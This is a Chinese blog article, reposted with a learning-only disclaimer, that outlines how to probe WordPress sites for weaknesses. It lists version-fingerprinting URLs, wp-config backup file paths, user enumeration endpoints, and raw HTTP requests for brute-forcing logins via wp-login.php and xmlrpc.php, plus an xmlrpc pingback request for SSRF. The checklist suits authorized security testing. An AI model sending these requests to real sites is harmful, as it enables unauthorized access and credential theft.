干货 | WordPress网站渗透方法指南

如果您遇到使用 WordPress 的网站，您会怎么做，渗透思路和安全检测思路？ 如何挖掘Wordpress网站的漏洞 如果您访问https://target.com并查看源代码，您将看到来自 WordPress 的主题和插件的链接。 或者你可以访问https://target.com/wp-login.php，它是 WordPress 登录管理页面 通过查看核心、插件和主题版本找到相关的CVE 如何找到wordpress版本 https://target.com/feed https://target.com/?feed=rss2 如何找到插件版本 https://target.com/wp-content/plugins/PLUGINNAME/readme.txthttps://target.com/wp-content/plugins/PLUGINNAME/readme.TXThttps://target.com/wp-content/plugins/PLUGINNAME/README.txthttps://target.com/wp-content/plugins/PLUGINNAME/README.TXT 如何找到主题版本 https://target.com/wp-content/themes/THEMENAME/style.css https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file) 如果您发现过时的核心/插件/主题，请在https://wpscan.com找到漏洞利用 查找日志文件 http://target.com/wp-content/debug.log 查找备份文件 wp-config http://target.com/.wp-config.php.swphttp://target.com/wp-config.inchttp://target.com/wp-config.oldhttp://target.com/wp-config.txthttp://target.com/wp-config.htmlhttp://target.com/wp-config.php.bakhttp://target.com/wp-config.php.disthttp://target.com/wp-config.php.inchttp://target.com/wp-config.php.oldhttp://target.com/wp-config.php.savehttp://target.com/wp-config.php.swphttp://target.com/wp-config.php.txthttp://target.com/wp-config.php.ziphttp://target.com/wp-config.php.htmlhttp://target.com/wp-config.php~ 获取网站上的用户名 http://target.com/?author=1 或者 http://target.com/wp-json/wp/v2/users http://target.com/?rest_route=/wp/v2/users 爆破后台账号密码 POST /wp-login.php HTTP/1.1Host: target.com log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 或者 POST /xmlrpc.php HTTP/1.1Host: target.com wp.getUsersBlogs 内容来自dedecms wordpress 中的 XSPA POST /xmlrpc.php HTTP/1.1Host: target.com pingback.ping

注册启用 http://example.com/wp-login.php?action=register 文章来源：HACK学习呀 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！ 如侵权请私聊我们删文 END